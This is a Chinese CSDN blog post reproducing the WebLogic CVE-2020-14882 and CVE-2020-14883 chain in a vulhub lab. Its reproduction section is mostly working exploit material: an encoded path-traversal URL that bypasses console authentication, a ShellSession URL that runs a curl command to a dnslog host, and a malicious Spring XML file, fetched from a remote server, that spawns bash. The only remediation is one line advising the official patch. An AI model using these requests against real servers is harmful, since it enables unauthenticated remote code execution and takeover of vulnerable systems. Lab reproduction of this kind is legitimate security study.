Weblogic-未授权命令执行漏洞(CVE-2020-14882&14883)

已于 2023-03-29 18:53:48 修改
阅读量369 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: weblogic web安全
于 2023-03-29 18:49:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/129842959
版权
文章详细介绍了Weblogic应用服务器的两个安全漏洞CVE-2020-14882和CVE-2020-14883,这两个漏洞允许未授权用户绕过权限验证并执行任意命令。通过利用这两个漏洞,攻击者可以远程执行命令。文章提供了环境搭建、复现步骤以及修复建议,包括更新官方补丁。
摘要由CSDN通过智能技术生成

Weblogic-未授权命令执行漏洞(CVE-2020-14882&14883)

0x00 前言

Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。

CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

0x01 环境搭建

这里是用的vulhub进行环境搭建

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IoEWzRLL-1680086781911)(05.Weblogic-未授权命令执行漏洞.assets/image-20230321205447502.png)]

0x02 复现步骤

1、首先测试权限绕过漏洞(CVE-2020-14882),访问URLhttp://your-ip:7001/console/css/%252e%252e%252fconsole.portal,即可未授权访问到管理后台页面

image-20230321205639906可以发现我们现在是低权限的用户,无法安装应用,所以也无法直接执行任意代码

2、所以我们要配合第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过com.tangosol.coherence.mvel2.sh.ShellSession,二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl%20test.zg235y.dnslog.cn');")

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-G6ib09IM-1680086786495)(null)]

这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。

3、com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext是一种更为通杀的方法,最早在CVE-2019-2725被提出,对于所有Weblogic版本均有效。

这个利用方法也有自己的缺点,就是需要Weblogic的服务器能够访问到恶意XML。

首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如http://example.com/rce.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[curl test.tvenvd.dnslog.cn]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")

image-20230321212738166

0x03 修复建议

1、更新Oracle官方发布的最新补丁

贫僧法号云空丶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic管理控制台授权远程命令执行漏洞
weixin_45911307的博客
04-12 4205
Weblogic 默认端口号:7001 (1)weblogic管理控制台授权远程命令执行漏洞 CVE-2020-14882 1,拉取环境 2,访问网站 3,启动完成后,访问http://your-ip:7001/console查看管理员控制台登录页面 4,使用此 URL 绕过 Console 组件的身份验证: http://your-ip:7001/console/css/%252e%252e%252fconsole.portal 5, 访问以下 URL 以链接 2 个
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883
weixin_47311099的博客
12-07 491
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以授权的任意用户身份执行命令。 参考链接:https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020
weblogic授权命令执行漏洞(CVE-2020-14882)复现
weixin_45291045的博客
04-01 3527
文章目录漏洞概述漏洞影响范围环境搭建漏洞复现利用工具 漏洞概述 经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server执行任意代码。 漏洞影响范围 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Webl
CVE-2020-14882​&14883Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
cve_2020_14883.zip
05-28
标题 "cve_2020_14883.zip" 暗示了这是一个与CVE-2020-14883安全漏洞相关的压缩文件包,该漏洞可能涉及Oracle WebLogic ServerOracle WebLogic Server是一款广泛应用的企业级Java EE应用服务器,为企业提供集成的...
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 ...通过该漏洞,攻击者可以在授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以实现远程代码执行获取目标服务器的权限。
weblogic_12.2.1_授权访问漏洞_CVE-2023-21839
acdcccc的博客
09-18 212
Weblogic_12.2.1 授权访问漏洞复现
weblogic任意文件上传、授权命令执行
m0_67284865的博客
07-05 797
Weblogic管理端授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。
Weblogic常见漏洞详解
最新发布
m0_64481831的博客
03-01 3454
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
Weblogic 常见漏洞分析与利用
未完成的歌~的博客
03-23 8812
一直没有系统的总结过 weblogic漏洞,今天通过 vulhub 靶场来复现几个经典的案例。WebLogic 是美国 Oracle 公司出品的一个基于 JAVAEE 架构的中间件,是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的Java应用服务器。WebLogic 由纯 Java 开发,长期以来一直被认为是市场上最好的J2EE工具之一,被广泛应用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。
CVE-2020-14882 weblogic授权远程命令执行漏洞
栉风沐雪的博客
02-22 4399
Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC 被公开,经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
漏洞复现】Weblogic授权命令执行漏洞CVE-2020-14882
weixin_43486390的博客
12-17 2097
CVE-2020-14882
Weblogic授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1616
weblogic漏洞复现
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882CVE-2020-14883 被发现,这些漏洞的存在使得授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值